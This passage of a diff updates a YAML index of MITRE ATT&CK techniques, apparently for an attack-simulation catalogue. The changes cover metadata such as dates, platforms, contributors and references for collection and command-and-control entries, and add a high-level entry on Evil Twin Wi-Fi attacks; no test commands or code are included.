         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-26T23:12:30.499Z'
       name: Dead Drop Resolver
       description: |-
         Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.
@@ -38722,8 +39202,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1001.001:
     technique:
@@ -38777,7 +39255,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
 collection:
   T1560.001:
@@ -38853,7 +39330,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1560.001
     atomic_tests: []
   T1113:
@@ -38910,7 +39386,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
       identifier: T1113
     atomic_tests: []
   T1557:
@@ -39004,7 +39479,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.001:
     technique:
@@ -39083,7 +39557,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.001
     atomic_tests: []
   T1602:
@@ -39122,7 +39595,7 @@ collection:
         Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.
 
         Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T21:32:58.274Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Data from Configuration Repository
       x_mitre_detection: 'Identify network traffic sent or received by untrusted hosts
@@ -39137,30 +39610,10 @@ collection:
       - 'Network Traffic: Network Connection Creation'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1213.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
-      type: attack-pattern
-      created: '2020-02-14T13:35:32.938Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1213.002
-        url: https://attack.mitre.org/techniques/T1213/002
-      - url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
-        description: Microsoft. (2017, July 19). Configure audit settings for a site
-          collection. Retrieved April 4, 2018.
-        source_name: Microsoft SharePoint Logging
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Sharepoint
       description: |
         Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:
@@ -39169,13 +39622,17 @@ collection:
         * Physical / logical network diagrams
         * System architecture diagrams
         * Technical system documentation
-        * Testing / development credentials
+        * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
         * Work / project schedules
         * Source code snippets
         * Links to network shares and other internal resources
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
+      x_mitre_deprecated: false
       x_mitre_detection: "The user access logging within Microsoft's SharePoint can
         be configured to report access to certain pages and documents. (Citation:
         Microsoft SharePoint Logging). As information repositories generally have
@@ -39189,20 +39646,37 @@ collection:
         of programmatic means being used to retrieve all data within the repository.
         In environments with high-maturity, it may be possible to leverage User-Behavioral
         Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      - 'Cloud Service: Cloud Service Metadata'
+      type: attack-pattern
+      id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
+      created: '2020-02-14T13:35:32.938Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/002
+        external_id: T1213.002
+      - source_name: Microsoft SharePoint Logging
+        description: Microsoft. (2017, July 19). Configure audit settings for a site
+          collection. Retrieved April 4, 2018.
+        url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
     atomic_tests: []
   T1123:
     technique:
-      modified: '2024-01-23T22:53:18.389Z'
+      modified: '2024-10-15T13:39:22.774Z'
       name: Audio Capture
       description: |-
         An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.(Citation: ESET Attor Oct 2019)
@@ -39245,7 +39719,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1123
     atomic_tests: []
   T1560.003:
@@ -39270,7 +39743,7 @@ collection:
         description: 'ESET. (2016, October). En Route with Sednit - Part 2: Observing
           the Comings and Goings. Retrieved November 21, 2016.'
         source_name: ESET Sednit Part 2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T22:48:14.605Z'
       name: Archive via Custom Method
       description: 'An adversary may compress or encrypt data that is collected prior
         to exfiltration using a custom method. Adversaries may choose to use custom
@@ -39290,22 +39763,24 @@ collection:
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Script: Script Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1114:
     technique:
-      modified: '2023-09-29T21:06:03.098Z'
+      modified: '2024-10-15T12:24:27.627Z'
       name: Email Collection
       description: 'Adversaries may target user email to collect sensitive information.
         Emails may contain sensitive data, including trade secrets or personal information,
-        that can prove valuable to adversaries. Adversaries can collect or forward
-        email from mail servers or clients. '
+        that can prove valuable to adversaries. Emails may also contain details of
+        ongoing incident response operations, which may allow adversaries to adjust
+        their techniques in order to maintain persistence or evade defenses.(Citation:
+        TrustedSec OOB Communications)(Citation: CISA AA20-352A 2021) Adversaries
+        can collect or forward email from mail servers or clients. '
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
       x_mitre_contributors:
       - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.
@@ -39322,11 +39797,10 @@ collection:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
-      - Google Workspace
       - macOS
       - Linux
-      x_mitre_version: '2.5'
+      - Office Suite
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -39342,37 +39816,28 @@ collection:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1114
         external_id: T1114
+      - source_name: CISA AA20-352A 2021
+        description: CISA. (2021, April 15). Advanced Persistent Threat Compromise
+          of Government Agencies, Critical Infrastructure, and Private Sector Organizations.
+          Retrieved August 30, 2024.
+        url: https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-352a
       - source_name: Microsoft Tim McMichael Exchange Mail Forwarding 2
         description: McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding.
           Retrieved October 8, 2019.
         url: https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/
+      - source_name: TrustedSec OOB Communications
+        description: 'Tyler Hudak. (2022, December 29). To OOB, or Not to OOB?: Why
+          Out-of-Band Communications are Essential for Incident Response. Retrieved
+          August 30, 2024.'
+        url: https://trustedsec.com/blog/to-oob-or-not-to-oob-why-out-of-band-communications-are-essential-for-incident-response
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1025:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - William Cain
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
-      type: attack-pattern
-      created: '2017-05-31T21:30:31.584Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        url: https://attack.mitre.org/techniques/T1025
-        external_id: T1025
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:30:50.936Z'
       name: Data from Removable Media
       description: "Adversaries may search connected removable media on computers
         they have compromised to find files of interest. Sensitive data can be collected
@@ -39384,75 +39849,93 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - William Cain
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor processes and command-line arguments for actions
         that could be taken to collect files from a system's connected removable media.
         Remote access tools with built-in features may interact directly with the
         Windows API to gather data. Data may also be acquired through Windows system
         management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
         and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Access'
       x_mitre_system_requirements:
       - Privileges to access removable media drive and files
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
+      created: '2017-05-31T21:30:31.584Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1025
+        external_id: T1025
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1025
     atomic_tests: []
   T1074.001:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Massimiliano Romano, BT Security
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
-      created: '2020-03-13T21:13:10.467Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1074.001
-        url: https://attack.mitre.org/techniques/T1074/001
-      - source_name: Prevailion DarkWatchman 2021
-        url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
-        description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
-          new evolution in fileless techniques. Retrieved January 10, 2022.'
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-08-26T16:28:39.920Z'
+      name: 'Data Staged: Local Data Staging'
       description: |-
         Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
 
         Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.(Citation: Prevailion DarkWatchman 2021)
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Data Staged: Local Data Staging'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Massimiliano Romano, BT Security
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
 
         Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
 
         Consider monitoring accesses and modifications to local storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: collection
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
+      created: '2020-03-13T21:13:10.467Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1074/001
+        external_id: T1074.001
+      - source_name: Prevailion DarkWatchman 2021
+        description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
+          new evolution in fileless techniques. Retrieved January 10, 2022.'
+        url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1074.001
     atomic_tests: []
   T1114.001:
@@ -39479,7 +39962,7 @@ collection:
         url: https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790
         description: Microsoft. (n.d.). Introduction to Outlook Data Files (.pst and
           .ost). Retrieved February 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T17:59:20.983Z'
       name: 'Email Collection: Local Email Collection'
       description: |-
         Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.
@@ -39503,13 +39986,11 @@ collection:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1114.001
     atomic_tests: []
   T1119:
     technique:
-      modified: '2024-01-02T13:35:57.680Z'
+      modified: '2024-09-25T20:40:07.791Z'
       name: Automated Collection
       description: "Once established within a system or network, an adversary may
         use automated techniques for collecting internal data. Methods for performing
@@ -39530,6 +40011,7 @@ collection:
         phase_name: collection
       x_mitre_contributors:
       - Praetorian
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Depending on the method used, actions could include common
         file system commands and parameters on the command-line interface within batch
@@ -39553,8 +40035,10 @@ collection:
       - Windows
       - IaaS
       - SaaS
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
+      - 'User Account: User Account Authentication'
       - 'Command: Command Execution'
       - 'File: File Access'
       - 'Script: Script Execution'
@@ -39579,7 +40063,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1119
     atomic_tests: []
   T1115:
@@ -39646,12 +40129,11 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1115
     atomic_tests: []
   T1530:
     technique:
-      modified: '2023-09-29T16:11:43.530Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Data from Cloud Storage Object
       description: "Adversaries may access data from cloud storage.\n\nMany IaaS providers
         offer solutions for online data object storage such as Amazon S3, Azure Storage,
@@ -39685,10 +40167,12 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Netskope
       - Praetorian
       - AppOmni
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor for unusual queries to the cloud provider's storage
         service. Activity originating from unexpected sources may indicate improper
@@ -39699,13 +40183,14 @@ collection:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
       - SaaS
-      - Google Workspace
-      - Office 365
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Metadata'
       - 'Cloud Storage: Cloud Storage Access'
       type: attack-pattern
       id: attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7
@@ -39746,37 +40231,11 @@ collection:
         url: https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1530
     atomic_tests: []
   T1074.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - IaaS
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
-      type: attack-pattern
-      created: '2020-03-13T21:14:58.206Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1074.002
-        url: https://attack.mitre.org/techniques/T1074/002
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-30T13:28:37.414Z'
       name: Remote Data Staging
       description: |-
         Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
@@ -39787,23 +40246,47 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
 
         Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Command: Command Execution'
       - 'File: File Access'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
+      created: '2020-03-13T21:14:58.206Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1074/002
+        external_id: T1074.002
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-12T23:54:39.466Z'
       name: Data from Local System
       description: |
         Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
@@ -39873,7 +40356,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1005
     atomic_tests: []
   T1560.002:
@@ -39908,7 +40390,7 @@ collection:
         description: Wikipedia. (2016, March 31). List of file signatures. Retrieved
           April 22, 2016.
         source_name: Wikipedia File Header Signatures
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-29T18:27:30.891Z'
       name: 'Archive Collected Data: Archive via Library'
       description: |-
         An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.
@@ -39927,10 +40409,89 @@ collection:
       x_mitre_data_sources:
       - 'Script: Script Execution'
       - 'File: File Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1560.002
     atomic_tests: []
+  T1557.004:
+    technique:
+      modified: '2024-11-11T18:52:53.686Z'
+      name: Evil Twin
+      description: "Adversaries may host seemingly genuine Wi-Fi access points to
+        deceive users into connecting to malicious networks as a way of supporting
+        follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+        [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+        or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+        ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+        network, fraudulent Wi-Fi access points may trick devices or users into connecting
+        to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+        evil twin)  Adversaries may provide a stronger signal strength or block access
+        to Wi-Fi access points to coerce or entice victim devices into connecting
+        to malicious networks.(Citation: specter ops evil twin)  A Wi-Fi Pineapple
+        – a network security auditing and penetration testing tool – may be deployed
+        in Evil Twin attacks for ease of use and broader range. Custom certificates
+        may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+        may also listen for client devices sending probe requests for known or previously
+        connected networks (Preferred Network Lists or PNLs). When a malicious access
+        point receives a probe request, adversaries can respond with the same SSID
+        to imitate the trusted, known network.(Citation: specter ops evil twin)  Victim
+        devices are led to believe the responding access point is from their PNL and
+        initiate a connection to the fraudulent network.\n\nUpon logging into the
+        malicious Wi-Fi access point, a user may be directed to a fake login page
+        or captive portal webpage to capture the victim’s credentials. Once a user
+        is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+        network activity, manipulate data, or steal additional credentials. Locations
+        with high concentrations of public Wi-Fi access, such as airports, coffee
+        shops, or libraries, may be targets for adversaries to set up illegitimate
+        Wi-Fi access points. "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Menachem Goldstein
+      - DeFord L. Smith
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Traffic Flow'
+      type: attack-pattern
+      id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+      created: '2024-09-17T14:27:40.947Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1557/004
+        external_id: T1557.004
+      - source_name: Kaspersky evil twin
+        description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+          them. Retrieved September 17, 2024.
+        url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+      - source_name: medium evil twin
+        description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+          Attack. Retrieved September 17, 2024.
+        url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+      - source_name: specter ops evil twin
+        description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+          Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+          17, 2024.
+        url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+      - source_name: Australia ‘Evil Twin’
+        description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+          WiFi attack on plane. Retrieved September 17, 2024.
+        url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1602.002:
     technique:
       x_mitre_platforms:
@@ -39959,7 +40520,7 @@ collection:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
         description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted
           by Cyber Actors. Retrieved October 2, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-02-17T19:50:46.948Z'
       name: Network Device Configuration Dump
